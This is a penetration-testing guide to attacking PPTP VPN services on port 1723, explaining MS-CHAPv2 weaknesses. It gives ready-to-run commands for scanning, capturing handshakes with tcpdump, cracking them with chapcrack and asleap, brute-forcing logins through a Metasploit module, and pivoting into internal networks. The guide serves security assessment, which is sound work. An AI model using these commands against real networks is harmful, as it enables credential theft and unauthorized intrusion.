PPTP - Port 1723

Basic info

The Point-to-Point Tunneling Protocol (PPTP) is a network protocol used to implement virtual private networks (VPNs). While PPTP has been widely adopted due to its ease of configuration and speed, it is notoriously vulnerable. Understanding how to identify, test, and exploit these vulnerabilities is essential for penetration testers.

This guide covers in-depth technical methods to identify, analyze, and exploit PPTP, allowing security professionals to perform accurate vulnerability assessments and simulate real-world attack vectors.

Understanding the PPTP Protocol Structure

PPTP uses the following components:

• TCP Port 1723: For control messages

• GRE (Generic Routing Encapsulation): Protocol number 47, used to encapsulate PPP frames

Misconfigured or poorly filtered GRE traffic can lead to exploitable situations where the attacker intercepts or manipulates the VPN communication.

Authentication Mechanisms and Weaknesses

PPTP uses Microsoft’s Point-to-Point Encryption (MPPE) combined with MS-CHAPv1 or MS-CHAPv2. Both have critical weaknesses.

MS-CHAPv2 Authentication Vulnerabilities

• Susceptible to dictionary attacks

• Challenge-response mechanisms can be captured and cracked

• NT Hash is derived from the user password, allowing offline brute-force

Identifying PPTP Services During Network Reconnaissance

Nmap Scanning for PPTP Detection

To identify active PPTP services, use the Nmap port scanner targeting TCP port 1723:

nmap -sS -p 1723 --script pptp-version <target-ip>

Look for:

• Open port 1723 (PPTP control channel)

• OS fingerprinting to detect routers or VPN appliances

Banner Grabbing

Use Netcat to manually interact with the PPTP port:

nc <target-ip> 1723

A PPTP server typically responds with GRE negotiation identifiers.

Capturing and Cracking MS-CHAPv2 Handshakes

Tools for PPTP Handshake Capture

Use a Man-in-the-Middle approach or capture with Wireshark on port 1723 and GRE:

tcpdump -i eth0 port 1723 or proto gre -w pptp_handshake.pcap

Cracking with chapcrack and asleap

1. Extract challenge and response:

   Copy

   chapcrack -i pptp_handshake.pcap -o challenge_response.txt

2. Crack using asleap:

   Copy

   asleap -C <challenge> -R <response> -W /path/to/wordlist

This enables offline cracking of MS-CHAPv2 handshakes using known dictionaries.

Exploiting PPTP Using Metasploit

Metasploit includes auxiliary modules for PPTP brute-force:

bashCopyEdituse auxiliary/scanner/vpn/pptp_login
set RHOSTS <target>
set USER_FILE users.txt
set PASS_FILE passwords.txt
run

You can combine this with previously cracked NTLM hashes to validate credentials.

VPN Pivoting After PPTP Access

After compromising PPTP, attackers can establish a VPN session and pivot into internal networks.

Use tools like pptpsetup or pppd to establish the session:

pptpsetup --create pptpvpn --server <target-ip> --username user --password pass --encrypt
pon pptpvpn

Confirm GRE tunneling is established and route internal traffic through the VPN interface.